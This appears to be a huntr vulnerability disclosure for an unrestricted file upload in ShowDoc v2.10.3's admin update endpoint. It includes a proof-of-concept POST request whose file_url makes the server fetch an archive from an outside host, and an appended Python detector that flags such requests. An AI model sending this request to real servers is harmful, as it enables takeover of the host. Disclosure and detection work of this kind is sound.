huntr | Metastor | D205C489-3266-4AC4-ACB7-C8EE570887F7
Mar 20, 2022 - 7:41 a.m.

There is an Unrestricted Upload of File vulnerability in ShowDoc v2.10.3

2022-03-20 07:41:31
metastor
www.huntr.dev

EPSS

0.001

Percentile

41.1%

Description

There is an Unrestricted Upload of File vulnerability in AdminUpdateController.class.php in ShowDoc v2.10.3.

Proof of Concept

POST /showdoc-2.10.3/server/index.php?s=/api/adminUpdate/download HTTP/1.1
Host: 10.211.55.5
Content-Length: 66
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://10.211.55.5
Referer: http://10.211.55.5/showdoc-2.10.3/web/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=47uvgq7efm1ethua6a8podcse6; think_language=zh-CN; cookie_token=09d404934af99f9a7cafad11e061df0c23fc785a28781b655a152a7b1eb43000
Connection: origin

new_version=666&file_url=http://192.168.1.7:88/showdoc-666.zip

Impact

After logging in to the admin panel, an attacker can use this vulnerability to obtain server privileges.
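
Detection

A defensive check for the request shown in the proof of concept, added here as an example (it is not code from the report or from ShowDoc): it parses a raw HTTP request captured at a reverse proxy or WAF and flags calls to the adminUpdate/download route whose file_url points at a host outside an allowlist. The function names, the allowlist host and the sample request are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: hosts this deployment legitimately fetches updates from (placeholder).
ALLOWED_UPDATE_HOSTS = {"updates.example.invalid"}

# Constructed sample, trimmed from the proof-of-concept request above.
SAMPLE = (
    "POST /showdoc-2.10.3/server/index.php?s=/api/adminUpdate/download HTTP/1.1\n"
    "Host: 10.211.55.5\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "new_version=666&file_url=http://192.168.1.7:88/showdoc-666.zip\n"
)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()

def check_update_request(raw, allowed=ALLOWED_UPDATE_HOSTS):
    """Return a finding for a suspicious adminUpdate/download call, else None."""
    method, target, _headers, body = parse_request(raw)
    # ShowDoc routes arrive in the "s" query parameter; compare case-insensitively.
    route = parse_qs(urlsplit(target).query).get("s", [""])[0].strip("/").lower()
    if method != "POST" or route != "api/adminupdate/download":
        return None
    file_url = parse_qs(body).get("file_url", [""])[0]
    host = (urlsplit(file_url).hostname or "").lower()
    if host in allowed:
        return None
    return {
        "route": route,
        "file_url": file_url,
        "host": host,
        "reason": "update archive requested from a host outside the allowlist",
    }

if __name__ == "__main__":
    print(check_update_request(SAMPLE))
```

The check only covers the route form used in the request above (route in the s query parameter, form-encoded body); other routing styles would need their own match.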
